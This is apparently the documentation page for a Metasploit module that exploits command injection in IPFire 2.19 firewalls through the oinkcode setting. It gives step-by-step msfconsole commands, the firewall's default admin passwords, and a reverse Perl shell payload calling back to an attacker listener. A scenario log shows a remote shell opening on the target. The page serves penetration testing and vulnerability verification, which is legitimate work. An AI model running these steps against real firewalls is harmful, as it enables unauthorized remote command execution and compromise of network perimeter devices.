## Vulnerable Application

  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)

This module has been verified against:

1. 2.19 core 100
2. 2.19 core 110 (exploit-db, not metasploit module)

## Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
  4. Do: ```set password admin``` or whatever it was set to at install
  5. Do: ```set rhost 10.10.10.10```
  6. Do: ```set payload cmd/unix/reverse_perl```
  7. Do: ```set lhost 192.168.2.229```
  8. Do: ```exploit```
  9. You should get a shell.

## Options

### PASSWORD

  Password is set at install.  May be blank, 'admin', or 'ipfire'.

## Scenarios

  ```
    msf > use exploit/linux/http/ipfire_oinkcode_exec 
    msf exploit(ipfire_oinkcode_exec) > set password admin
    password => admin
    msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
    rhost => 192.168.2.201
    msf exploit(ipfire_oinkcode_exec) > set verbose true
    verbose => true
    msf exploit(ipfire_oinkcode_exec) > check
    [*] 192.168.2.201:444 The target appears to be vulnerable.
    msf exploit(ipfire_oinkcode_exec) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.117:4444 
    [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
    id
    uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
    whoami
    nobody
  ```